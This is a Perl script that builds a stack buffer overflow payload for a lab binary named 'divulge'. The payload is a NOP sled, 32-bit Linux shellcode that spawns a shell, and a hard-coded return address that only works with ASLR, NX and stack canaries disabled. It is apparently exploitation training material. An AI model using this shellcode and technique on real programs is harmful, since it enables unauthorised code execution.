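#!/usr/bin/perl
use strict;
use warnings;

# Builds the input file for the "divulge" lab binary: a NOP sled, a short
# 32-bit Linux stack shellcode that spawns a shell, and a return address that
# points back into the sled.  The mnemonics on each line are the disassembly
# of the bytes beside them; only the byte strings are written out.
my $shellcode =
    "\x31\xc0" .                # xorl   %eax, %eax
    "\x50" .                    # pushl  %eax
    "\x68\x6e\x2f\x73\x68" .    # pushl  $0x68732f6e
    "\x68\x2f\x2f\x62\x69" .    # pushl  $0x69622f2f
    "\x89\xe3" .                # movl   %esp, %ebx
    "\x99" .                    # cltd
    "\x52" .                    # pushl  %edx
    "\x53" .                    # pushl  %ebx
    "\x89\xe1" .                # movl   %esp, %ecx
    "\xb0\x0b" .                # movb   $0xb, %al
    "\xcd\x80";                 # int    $0x80

# Return address, little-endian 0xbfffe990: the address of the target's
# writebuf (stack bottom 0xBFFFF080 minus the 0x6f0 offset measured for this
# binary).  It is hard-coded for the lab's fixed, non-randomised stack
# layout; with ASLR, NX or a stack canary enabled this layout assumption no
# longer holds, which is exactly what those mitigations are for.
my $retaddr = "\x90\xe9\xff\xbf";    # 0xbfffe990

# NOP sled so that landing anywhere in the first 244 bytes slides into the
# shellcode.
my $pad = "\x90" x 244;

# Full input for the victim program: 244 + 24 + 4 = 272 bytes.
my $arg = $pad . $shellcode . $retaddr;

# Write the payload as raw bytes.  Three-arg open with a lexical handle, and
# every I/O step checked, so a failed write is reported instead of producing
# a silently empty or truncated payload file.
my $out_file = 'payload_divulge';
open my $out, '>', $out_file or die "open $out_file: $!";
binmode $out;    # no newline or encoding translation of the binary payload
print {$out} $arg or die "write $out_file: $!";
close $out or die "close $out_file: $!";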